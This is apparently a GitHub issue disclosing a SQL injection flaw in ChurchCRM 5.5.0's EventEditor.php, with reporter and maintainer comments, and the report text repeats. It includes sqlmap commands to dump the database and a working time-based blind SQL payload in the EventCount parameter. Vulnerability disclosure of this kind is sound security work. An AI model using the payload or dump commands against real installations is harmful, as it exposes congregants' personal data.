You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
If you have the ChurchCRM software running, please file an issue using the Report an issue in the help menu.
On what page in the application did you find this issue?
EventEditor.php
On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Linux
What browser (and version) are you running?
Firefox
What version of PHP is the server running?
8.3.2
What version of SQL Server are you running?
11.2.2
What version of ChurchCRM are you running?
5.5.0
Severity: high
Credits :
Georgios Bitounis
Description:
SQL injection vulnerability in ChurchCRM v.5.5.0 allows a remote attacker to obtain sensitive information via the EventCount POST parameter within the /EventEditor.php.
Step 1 : Go to the EventEditor.php and create an event with thatever attributes you want and save.
Step 2 : Go to the ListEvents.php and edit your event and this will take you to EventEditor.php
Step 3 : Then Capture with burpsuite the request that saves the changes.
Step 4: sqlmap -r sql_eventeditor.txt
Step 5: sqlmap -r sql_eventeditor.txt --dump
Impact:
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
Affected Component:
/churchcrm/EventEditor.php
Technical Details:
The vulnerability is caused by the failure of the backend to effectively validate user input. An attacker can insert malicious sql code and dump the database, allowing the attacker to steal sensitive information and all the other neferious things.
Proof of Concept (PoC):
Parameter: Array-like -9
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EventID=2&EventExists=1&EventTypeName=Church Service&EventTypeID=1&EventTitle=Christmas Service&EventDesc=christmas service&EventDateRange=2016-12-24 10:30 PM - 2016-12-25 1:30 AM&NumAttendCounts=3&EventCount[]=100' AND (SELECT 8962 FROM (SELECT(SLEEP(5)))wjTG) AND 'LRYr'='LRYr&EventCountID[]=1&EventCountName[]=Total&EventCount[]=0&EventCountID[]=2&EventCountName[]=Members&EventCount[]=0&EventCountID[]=3&EventCountName[]=Visitors&EventCountNotes=&EventText=1&EventStatus=0&SaveChanges=Save Changes
Remediation:
1.Input validation: The simplest approach is Prepared Statements, all user input should be validated,filtered on the server-side to ensure that it conforms to the expected format and does not contain any malicious code.
The text was updated successfully, but these errors were encountered:
@0xIapetus Can you please check your PHP version (PHP 7.4 hasn't been supported since ChurchCRM 5.0.3) so I am unsure how you are running the latest code.
Also this says you are running ChurchCRM version 5.3. Have you tested this with the latest code?
The php version was 8.1, This has been tested on several versions and also the one git cloned/forked from github (5.5.0), if you try the PoC, it will work!
0xIapetus
changed the title
2) Bug: SQL Injection - EventEditor
2) Bug: SQL Injection
Feb 10, 2024
0xIapetus
changed the title
2) Bug: SQL Injection
2) Security Bug: SQL Injection
Feb 10, 2024
MrClever
changed the title
2) Security Bug: SQL Injection
Security Bug: SQL Injection
Feb 19, 2024
MrClever
changed the title
Security Bug: SQL Injection
Security Bug: SQL Injection - Event Editor
Feb 19, 2024
MrClever
changed the title
Security Bug: SQL Injection - Event Editor
Security Bug: SQL Injection - Event Editor via List Events
Feb 19, 2024
If you have the ChurchCRM software running, please file an issue using the Report an issue in the help menu.
On what page in the application did you find this issue?
EventEditor.php
On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Linux
What browser (and version) are you running?
Firefox
What version of PHP is the server running?
8.3.2
What version of SQL Server are you running?
11.2.2
What version of ChurchCRM are you running?
5.5.0
Severity: high
Credits :
Georgios Bitounis
Description:
SQL injection vulnerability in ChurchCRM v.5.5.0 allows a remote attacker to obtain sensitive information via the EventCount POST parameter within the /EventEditor.php.
Step 1 : Go to the EventEditor.php and create an event with thatever attributes you want and save.
Step 2 : Go to the ListEvents.php and edit your event and this will take you to EventEditor.php
Step 3 : Then Capture with burpsuite the request that saves the changes.
Step 4: sqlmap -r sql_eventeditor.txt
Step 5: sqlmap -r sql_eventeditor.txt --dump
Impact:
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
Affected Component:
/churchcrm/EventEditor.php
Technical Details:
The vulnerability is caused by the failure of the backend to effectively validate user input. An attacker can insert malicious sql code and dump the database, allowing the attacker to steal sensitive information and all the other neferious things.
Proof of Concept (PoC):
Parameter: Array-like -9
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EventID=2&EventExists=1&EventTypeName=Church Service&EventTypeID=1&EventTitle=Christmas Service&EventDesc=christmas service&EventDateRange=2016-12-24 10:30 PM - 2016-12-25 1:30 AM&NumAttendCounts=3&EventCount[]=100' AND (SELECT 8962 FROM (SELECT(SLEEP(5)))wjTG) AND 'LRYr'='LRYr&EventCountID[]=1&EventCountName[]=Total&EventCount[]=0&EventCountID[]=2&EventCountName[]=Members&EventCount[]=0&EventCountID[]=3&EventCountName[]=Visitors&EventCountNotes=&EventText=1&EventStatus=0&SaveChanges=Save Changes
Remediation:
1.Input validation: The simplest approach is Prepared Statements, all user input should be validated,filtered on the server-side to ensure that it conforms to the expected format and does not contain any malicious code.
The text was updated successfully, but these errors were encountered: